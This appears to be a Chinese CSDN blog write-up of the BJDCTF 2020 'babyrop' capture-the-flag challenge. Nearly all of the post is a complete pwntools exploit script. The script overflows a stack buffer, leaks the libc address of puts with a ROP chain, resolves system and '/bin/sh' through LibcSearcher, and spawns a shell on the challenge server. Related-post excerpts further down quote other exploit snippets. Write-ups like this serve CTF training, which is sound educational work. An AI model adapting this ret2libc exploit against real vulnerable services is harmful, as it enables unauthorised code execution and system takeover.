[BJDCTF 2020]babyrop

于 2023-12-17 18:22:17 发布
阅读量262 收藏
点赞数 9
分类专栏: PWN 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/135047907
版权

一道retlibc

不难,按照以往的就可以

from pwn import *
from LibcSearcher import *
i = remote('node4.anna.nssctf.cn',28197)
ret = 0x4004c9
pop_rdi = 0x400733
# vuln = 0x40067d
elf =ELF('./000')
main = elf.sym['main']
put_p = elf.plt['puts']
put_g = elf.got['puts']
payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(put_g)+p64(put_p)+p64(main)
i.recvuntil('Pull up your sword and tell me u story!')
i.sendline(payload)
i.recv()
puts_add = u64(i.recv(6).ljust(8,b'\x00'))

libc = LibcSearcher('puts',puts_add)
offset = puts_add - libc.dump('puts')
sys = offset +libc.dump('system')
bin_sh = offset + libc.dump("str_bin_sh")
payload2 = b'a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(sys)
i.recvuntil('Pull up your sword and tell me u story!')
i.sendline(payload2)
i.interactive()

提醒一下,elf.ELF是()不是[]

puts_add = u64(i.recv(6).ljust(8,b'\x00'))用来接收plt表中的puts的真实地址的

沈理大学牲
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
bjdctf_2020_babyrop
u014377094的博客
01-25 904
新手向解释
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 673
bjdctf_2020_babyrop
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
我要学pwn.day15
weixin_45963786的博客
07-26 492
bjdctf_2020_babyrop 潜心修炼,从基础开始 这是一道基础ROP题 解题流程 1.查看文件保护 $ checksec bjdctf_2020_babyrop [*] '/home/ctf/Downloads/pwnexercise/2018_rop/bjdctf_2020_babyrop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX:
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BUU刷题(三)
playmaker的博客
03-13 898
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
Flex资料,关于Flex的基础资料
08-25
关于Flex的入门基础资料,详细介绍了Flex的开发,是一部难得的Flex教程
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 397
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2822
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1458
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 409
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
buuctf pwn bjdctf_2020_babyrop
MrTreebook的博客
05-14 283
buuctf pwn bjdctf_2020_babyrop1.checksec2.IDA分析ropper3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我们接着看一下vuln函数 buf只有32,但是我们可以写64 很明显的溢出 本程序没开PIE 没开canary 再看一下有没有后门函数 没有"/bin/sh" 没有system()函数 那么就要通过泄露函数地址来计算libc的基地址了 64位程序在传参的时候需要用到寄存器 当参数少于7个时, 参数从左到
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 330
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
[BJDCTF2020]RSA
最新发布
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值